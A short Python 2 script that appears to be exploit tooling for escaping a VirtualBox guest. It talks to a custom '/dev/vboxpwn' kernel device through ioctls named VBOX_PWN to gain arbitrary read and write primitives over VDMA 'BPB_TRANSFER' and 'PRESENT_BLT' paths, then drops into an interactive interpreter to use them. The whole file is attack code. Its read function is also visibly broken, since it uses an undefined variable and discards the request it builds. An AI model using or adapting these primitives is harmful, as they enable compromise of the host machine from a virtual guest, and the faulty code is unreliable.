| import os, fcntl, struct, array, sys |
| |
| IOCTL_VBOX_PWN_VDMA_READ = 0x40106501l |
| IOCTL_VBOX_PWN_VDMA_WRITE = 0x80106502l |
| IOCTL_VBOX_PWN_VBVA_COMMAND = 0x80106503l |
| IOCTL_VBOX_PWN_VDMA_BPB_TRANSFER_READ = 0x40106504l |
| IOCTL_VBOX_PWN_VDMA_BPB_TRANSFER_WRITE = 0x80106505l |
| IOCTL_VBOX_PWN_GET_VRAM_SIZE = 0x40046506l |
| |
| if IOCTL_VBOX_PWN_VDMA_WRITE > sys.maxint: |
| IOCTL_VBOX_PWN_VDMA_WRITE = -2146409214 |
| if IOCTL_VBOX_PWN_VBVA_COMMAND > sys.maxint: |
| IOCTL_VBOX_PWN_VBVA_COMMAND = -2146409213 |
| if IOCTL_VBOX_PWN_VDMA_BPB_TRANSFER_WRITE > sys.maxint: |
| IOCTL_VBOX_PWN_VDMA_BPB_TRANSFER_WRITE = -2146409211 |
| |
| fd = os.open('/dev/vboxpwn', os.O_NONBLOCK | os.O_RDWR) |
| |
| # 4/5 = BPB_TRANSFER primitive, 1/2 = PRESENT_BLT primitive |
| read_type = 4 |
| write_type = 5 |
| |
| def read(offset, size): |
| data += '\0'*size |
| req = '' |
| req += struct.pack("IqP", size, offset) |
| req = array.array('b', req) |
| fcntl.ioctl(fd, IOCTL_VBOX_PWN_VDMA_BPB_TRANSFER_READ, data, 1) |
| #fcntl.ioctl(fd, IOCTL_VBOX_PWN_VDMA_READ, data, 1) |
| return data[16:] |
| |
| def write(offset, payload): |
| data = '' |
| data += struct.pack("IqP", len(payload), offset) |
| data += payload |
| fcntl.ioctl(fd, IOCTL_VBOX_PWN_VDMA_BPB_TRANSFER_WRITE, data) |
| #fcntl.ioctl(fd, IOCTL_VBOX_PWN_VDMA_WRITE, data) |
| |
| def get_vram_size(): |
| data = '\0'*4 |
| data = array.array('B', data) |
| fcntl.ioctl(fd, IOCTL_VBOX_PWN_GET_VRAM_SIZE, data, 1) |
| return struct.unpack('<I', data)[0] |
| |
| vram_sz = get_vram_size() |
| |
| import code |
| code.interact(local=locals()) |